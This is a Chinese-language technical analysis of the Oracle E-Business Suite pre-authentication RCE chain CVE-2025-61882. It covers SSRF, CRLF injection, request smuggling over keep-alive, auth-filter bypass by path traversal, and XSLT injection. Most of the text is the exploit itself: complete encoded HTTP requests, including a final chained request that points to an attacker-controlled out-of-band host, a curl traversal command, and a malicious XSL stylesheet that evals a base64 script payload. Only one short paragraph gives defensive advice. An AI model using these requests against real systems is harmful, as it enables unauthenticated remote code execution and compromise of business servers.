Oracle E-Business Suite预认证RCE漏洞链分析(CVE-2025-61882)
漏洞概述
CVE-2025-61882并非单一漏洞,而是由多个中小型弱点组成的完整攻击链,最终实现预认证远程代码执行。受影响版本包括12.2.3至12.2.14,攻击者无需身份验证即可通过网络远程利用此漏洞。
攻击链分解
阶段1:服务器端请求伪造(SSRF)
攻击首先向/OA_HTML/configurator/UiServlet发送特制XML请求,利用后端服务器发送任意HTTP请求。
漏洞代码分析:
1
2
3
4
5
6
7
8
9
10
11
12
|
if (paramHttpServletRequest.getParameter("killAndRestartServer") != null) {
// ...
} else if (paramHttpServletRequest.getParameter("generateOutput") != null) {
// ...
} else if (paramHttpServletRequest.getParameter("getUiType") != null) {
String str = paramHttpServletRequest.getParameter("redirectFromJsp");
XMLDocument xMLDocument = XmlUtil.parseXmlString(paramHttpServletRequest.getParameter("getUiType"));
if (str == null || "false".equalsIgnoreCase(str)) {
// ...
}
createNew(xMLDocument, httpSession, paramHttpServletRequest, paramHttpServletResponse);
}
|
攻击者通过getUiType参数传入XML文档,当redirectFromJsp设置为真时,XML内容被传递到createNew()函数处理。
SSRF触发请求:
1
2
3
4
5
6
|
POST /OA_HTML/configurator/UiServlet HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Content-Length: 407
redirectFromJsp=1&getUiType=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%0A%3Cinitialize%3E%0A%20%20%20%20%3Cparam%20name%3D%22init_was_saved%22%3Etest%3C%2Fparam%3E%0A%20%20%20%20%3Cparam%20name%3D%22return_url%22%3Ehttp%3A%2F%2F%7B%7Bexternal-host%7D%7D%3C%2Fparam%3E%0A%20%0A%20%20%20%20%3Cparam%20name%3D%22ui_def_id%22%3E0%3C%2Fparam%3E%0A%20%20%20%20%3Cparam%20name%3D%22config_effective_usage_id%22%3E0%3C%2Fparam%3E%0A%20%20%20%20%3Cparam%20name%3D%22ui_type%22%3EApplet%3C%2Fparam%3E%0A%3C%2Finitialize%3E
|
阶段2:CRLF注入
在SSRF基础上,攻击者通过CRLF(回车换行) payloads完全控制SSRF请求内容,注入任意HTTP头。
CRLF注入示例:
1
2
3
4
5
6
|
POST /OA_HTML/configurator/UiServlet HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Content-Length: 524
redirectFromJsp=1&getUiType=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%0A%3Cinitialize%3E%0A%20%20%20%20%3Cparam%20name%3D%22init_was_saved%22%3Etest%3C%2Fparam%3E%0A%20%20%20%20%3Cparam%20name%3D%22return_url%22%3E%3Chttp%3A%2F%2Fattacker-oob-server%3E%26%2347%3BHeaderInjectionTest%26%2332%3BHTTP%26%2347%3B1%26%2346%3B1%26%2313%3B%26%2310%3BInjectedHeader%26%2358%3BInjected%26%2313%3B%26%2310%3B%26%2332%3B%26%2313%3B%26%2310%3B%26%2313%3B%26%2313%3B%26%2310%3B%26%2313%3B%26%2313%3B%26%2310%3B%26%2313%3B%26%2313%3B%26%2310%3BPOST%26%2332%3B%26%2347%3B%3C%2Fparam%3E%0A%20%0A%20%20%20%20%3Cparam%20name%3D%22ui_def_id%22%3E0%3C%2Fparam%3E%0A%20%20%20%20%3Cparam%20name%3D%22config_effective_usage_id%22%3E0%3C%2Fparam%3E%0A%20%20%20%20%3Cparam%20name%3D%22ui_type%22%3EApplet%3C%2Fparam%3E%0A%3C%2Finitialize%3E
|
阶段3:HTTP持久连接利用
攻击链利用HTTP持久连接(keep-alive),通过SSRF和CRLF注入控制请求帧,然后在同一TCP连接上链接额外请求,提高可靠性并减少噪音。
阶段4:认证过滤器绕过
Oracle EBS部署通常在7201/TCP端口暴露核心应用服务。攻击链利用已知主机名apps.example.com向内部服务走私请求。
认证绕过技术:
通过路径遍历技术../或Java特定的..;/绕过Java应用过滤器,因为/help/路径不需要认证。
示例请求:
1
|
curl -s --path-as-is http://apps.example.com:7201/OA_HTML/help/../ieshostedsurvey.jsp
|
阶段5:XSL转换(XSLT)注入
攻击链最终目标ieshostedsurvey.jsp存在XSLT处理漏洞:
漏洞代码分析:
1
2
3
4
5
6
7
8
9
10
|
StringBuffer urlbuf = new StringBuffer();
urlbuf.append("http://");
urlbuf.append(request.getServerName());
urlbuf.append(":").append(request.getServerPort()).append(URI.toString());
String xslURL = urlbuf.toString() + "ieshostedsurvey.xsl";
URL stylesheetURL = new URL(xslURL.toString());
XSLStylesheet sheet = new XSLStylesheet(stylesheetURL,stylesheetURL);
XSLProcessor xslt = new XSLProcessor();
xslt.processXSL(sheet, xmlDoc, new PrintWriter(new BufferedWriter(new OutputStreamWriter(outBytes))));
|
代码从传入的Host头构建远程URL,导致Java代码从攻击者控制的服务器下载ieshostedsurvey.xsl。由于Java中的XSLT处理可以调用模板和扩展函数,加载不受信任的样式表允许攻击者实现任意远程代码执行。
完整攻击链整合
最终攻击请求:
1
2
3
4
5
6
7
8
9
10
11
12
13
|
POST /OA_HTML/configurator/UiServlet HTTP/1.1
Host: not-actually-watchtowr.com-stop-emailing-us-about-iocs:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
CSRF-XHR: YES
FETCH-CSRF-TOKEN: 1
Cookie: JSESSIONID=_NG5Yg8cBERFjA5L23s9UUyzG7G8hSZpYkmc6YAEBjT71alQ2UH6!906988146; EBSDB=oSVgJCh0YacxUZCwOlLajtL2zo
Content-Length: 847
Content-Type: application/x-www-form-urlencoded
redirectFromJsp=1&getUiType=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%0A%3Cinitialize%3E%0A%20%20%20%20%3Cparam%20name%3D%22init_was_saved%22%3Etest%3C%2Fparam%3E%0A%20%20%20%20%3Cparam%20name%3D%22return_url%22%3E%3Chttp%3A%2F%2Fapps.example.com%3A7201%3E%26%2347%3BOA_HTML%26%2347%3Bhelp%26%2347%3B..%26%2347%3Bieshostedsurvey.jsp%26%2332%3BHTTP%26%2347%3B1.2%0AHost%3A%26%2332%3Battacker-oob-server%0AUser-Agent%3A%26%2332%3Banything%0AConnection%3A%26%2332%3Bkeep-alive%0ACookie%3A%26%2332%3BJSESSIONID%3D_NG5Yg8cBERFjA5L23s9UUyzG7G8hSZpYkmc6YAEBjT71alQ2UH6!906988146%3B%26%2332%3BEBSDB%3DoSVgJCh0YacxUZCwOlLajtL2zo%0A%20%0A%0APOST%26%2332%3B%26%2347%3B%3C%2Fparam%3E%0A%20%0A%20%20%20%20%3Cparam%20name%3D%22ui_def_id%22%3E0%3C%2Fparam%3E%0A%20%20%20%20%3Cparam%20name%3D%22config_effective_usage_id%22%3E0%3C%2Fparam%3E%0A%20%20%20%20%3Cparam%20name%3D%22ui_type%22%3EApplet%3C%2Fparam%3E%0A%3C%2Finitialize%3E
|
攻击者在控制的服务器上提供恶意XSL文档触发任意代码执行:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
|
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:b64="http://www.oracle.com/XSL/Transform/java/sun.misc.BASE64Decoder"
xmlns:jsm="http://www.oracle.com/XSL/Transform/java/javax.script.ScriptEngineManager"
xmlns:eng="http://www.oracle.com/XSL/Transform/java/javax.script.ScriptEngine"
xmlns:str="http://www.oracle.com/XSL/Transform/java/java.lang.String">
<xsl:template match="/">
<xsl:variable name="bs" select="b64:decodeBuffer(b64:new(),'[base64_encoded_payload]')"/>
<xsl:variable name="js" select="str:new($bs)"/>
<xsl:variable name="m" select="jsm:new()"/>
<xsl:variable name="e" select="jsm:getEngineByName($m, 'js')"/>
<xsl:variable name="code" select="eng:eval($e, $js)"/>
<xsl:value-of select="$code"/>
</xsl:template>
</xsl:stylesheet>
|
防御建议
该漏洞链展示了现代攻击的复杂性,防御者需要全面监控网络流量,及时应用Oracle官方补丁,并对内部服务访问实施严格网络分段控制。